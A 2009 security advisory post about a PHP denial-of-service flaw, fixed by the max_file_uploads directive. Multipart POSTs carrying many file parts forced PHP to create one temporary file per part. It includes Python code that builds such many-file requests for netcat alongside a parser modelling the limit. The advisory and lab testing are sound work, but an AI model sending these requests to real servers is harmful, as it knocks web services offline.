November 24, 2009

Denial of Service in PHP

It was about time: the PHP team has finally added a max_file_uploads directive that limits the number of file uploads accepted per request (the default is 20). (cf. http://www.php.net/ChangeLog-5.php#5.3.1)

Until PHP 5.3.1, a single request could carry an arbitrary number X of file parts, and PHP would dutifully create X temporary files on the targeted system while parsing the request, before the script even ran. Repeating this is enough to overload the system and bring the web server down.

Suhosin already had an equivalent option, suhosin.upload.max_uploads (default 25), so systems running the Suhosin patch were already protected.

The recommendation is to upgrade to the 5.3.1 release (or apply the patch provided by PHP), or to set file_uploads = Off in php.ini if the site does not use file uploads at all. Keep in mind that not having a file upload form on your site does not make you safe: all it takes is a POST with a multipart/form-data content type to any PHP script, as defined in RFC 1867, and PHP will process every file part whether or not the script ever reads $_FILES.
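To make the two points above concrete (a request with many RFC 1867 file parts, and a server-side cap on how many of them get turned into temporary files), here is an added example in Python. It is not code from the post or from PHP: build_multipart() constructs a multipart/form-data body with N tiny file parts (plus optional ordinary form fields, which never become temp files), build_request() wraps it in a raw HTTP POST that can be piped into netcat against a test host, and count_file_parts() parses such a body and applies a max_file_uploads-style limit. The boundary string, the hostname and the exact behaviour for parts beyond the limit (silently dropped) are assumptions of this example, not documented PHP behaviour.

```python
"""Build and parse RFC 1867 multipart/form-data bodies to reason about
per-request file-upload counts. Added example, not code from the post."""

BOUNDARY = "----php-upload-count-test"  # assumed boundary value


def build_multipart(num_files, extra_fields=0, boundary=BOUNDARY):
    """Return a multipart/form-data body carrying num_files file parts.

    Each file part is a one-byte file: what hurts the server is the number
    of parts (one temp file each), not their size. extra_fields adds plain
    form fields, which carry no filename and produce no temp file.
    """
    chunks = []
    for i in range(extra_fields):
        chunks.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="field{i}"\r\n'
            "\r\n"
            "value\r\n"
        )
    for i in range(num_files):
        chunks.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="f{i}"; filename="f{i}.txt"\r\n'
            "Content-Type: text/plain\r\n"
            "\r\n"
            "x\r\n"
        )
    chunks.append(f"--{boundary}--\r\n")  # closing delimiter
    return "".join(chunks).encode("ascii")


def build_request(host, path, body, boundary=BOUNDARY):
    """Wrap body in a raw HTTP/1.1 POST (constructed; pipe into netcat).

    The target needs no upload form: any PHP script receiving a
    multipart/form-data POST goes through the upload handler.
    """
    headers = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return headers.encode("ascii") + body


def count_file_parts(body, boundary=BOUNDARY, max_file_uploads=20):
    """Parse a multipart body the way a limit-aware upload handler would.

    Returns (accepted, dropped): the first max_file_uploads file parts are
    accepted (each would become a temp file), the rest are dropped. Only
    parts whose headers carry a filename= parameter count as file uploads.
    Dropping, rather than rejecting the request, is an assumption here.
    """
    delim = b"--" + boundary.encode("ascii")
    accepted = dropped = 0
    for raw in body.split(delim)[1:]:  # chunk 0 is the preamble
        if raw.startswith(b"--"):      # "--boundary--" ends the body
            break
        headers = raw.partition(b"\r\n\r\n")[0].lower()
        if b"filename=" not in headers:
            continue                   # ordinary field, no temp file
        if accepted < max_file_uploads:
            accepted += 1
        else:
            dropped += 1
    return accepted, dropped


if __name__ == "__main__":
    body = build_multipart(25)
    print(build_request("target.example", "/index.php", body).decode("ascii")[:200])
    print("unlimited (pre-5.3.1):", count_file_parts(body, max_file_uploads=10**9))
    print("max_file_uploads=20   :", count_file_parts(body))
```

Run against a lab host of your own, the same body sent to a PHP < 5.3.1 script with no upload code at all will still leave one temp file per part in upload_tmp_dir for the lifetime of the request; with max_file_uploads or suhosin.upload.max_uploads in effect, only the first 20 (or 25) are created.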